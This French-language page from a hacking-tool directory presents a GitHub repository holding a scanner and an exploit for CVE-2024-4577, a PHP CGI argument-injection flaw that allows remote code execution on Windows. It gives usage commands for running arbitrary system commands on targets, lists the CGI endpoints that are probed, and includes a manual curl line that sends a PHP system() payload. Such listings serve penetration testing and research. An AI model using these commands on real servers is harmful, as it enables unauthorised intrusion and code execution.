Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-4577 — Scanner et outil d'exploitation pour CVE-2024-4577, une vulnérabilité d'injection d'arguments CGI PHP permettant l'exécution de code à distance sur les systèmes Windows. Inclut des modules de détection et d'exécution de commandes. | Kitploit
Outils/GitHubGitHub/r0otk3r/cve-2024-4577
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
GitHubr0otk3r/cve-2024-4577

CVE-2024-4577

Scanner et outil d'exploitation pour CVE-2024-4577, une vulnérabilité d'injection d'arguments CGI PHP permettant l'exécution de code à distance sur les systèmes Windows. Inclut des modules de détection et d'exécution de commandes.

Voir le dépôt
3il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-4577 - Injection d'arguments PHP CGI RCE

Résumé

CVE-2024-4577 est une vulnérabilité critique d'injection d'arguments CGI PHP qui affecte les systèmes Windows exécutant PHP en mode CGI. Cette faille permet à des attaquants distants d'injecter des arguments dans la ligne de commande de PHP via des URL spécialement conçues, conduisant à une exécution de code à distance (RCE).

Ce dépôt contient :

  • CVE-2024-4577.py : un scanner pour détecter les cibles vulnérables.
  • exploit.py : un outil d'exploitation qui envoie du code PHP et exécute des commandes système sur le serveur vulnérable.

⚠️ AVERTISSEMENT
Ce projet est destiné uniquement à des fins éducatives et à des tests autorisés. Toute utilisation abusive de ce code n'engage pas la responsabilité de l'auteur. Utilisez-le de manière responsable et uniquement dans des environnements qui vous appartiennent ou pour lesquels vous disposez d'une autorisation explicite de test.


Prérequis

  • Python 3.x
  • la bibliothèque requests

Installer les dépendances :

root@kitploit:~
pip install -r requirements.txt

Utilisation du scanner

Détecter si une cible est vulnérable à CVE-2024-4577 :

Cible unique

root@kitploit:~
python3 CVE-2024-4577.py -u http://target.com

1

Plusieurs cibles depuis un fichier

root@kitploit:~
python3 CVE-2024-4577.py -f urls.txt

2

Chemin personnalisé (optionnel)

root@kitploit:~
python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php

Exemples de chemins vulnérables

Le scanner et l'outil d'exploitation testent les points de terminaison CGI courants comme :

root@kitploit:~
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello

La charge utile contourne cgi.force_redirect et préfixe du PHP malveillant via php://input.


Utilisation de l'exploit

Exécuter des commandes système arbitraires sur une cible vulnérable :

Cible unique

root@kitploit:~
python3 exploit.py -u http://target.com -c "id"

4

Plusieurs cibles depuis un fichier

root@kitploit:~
python3 exploit.py -f urls.txt -c "id"

5

Avec curl

Vous pouvez également exploiter la vulnérabilité manuellement avec curl

root@kitploit:~
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"

Cette commande envoie une charge utile PHP qui exécute uname -a sur le serveur et renvoie la sortie.

3

Licence

Ce code est publié sous la licence MIT. Voir LICENSE pour plus d'informations.


Chaînes officielles

  • YouTube @rootctf
  • X @r0otk3r
Télécharger l’outil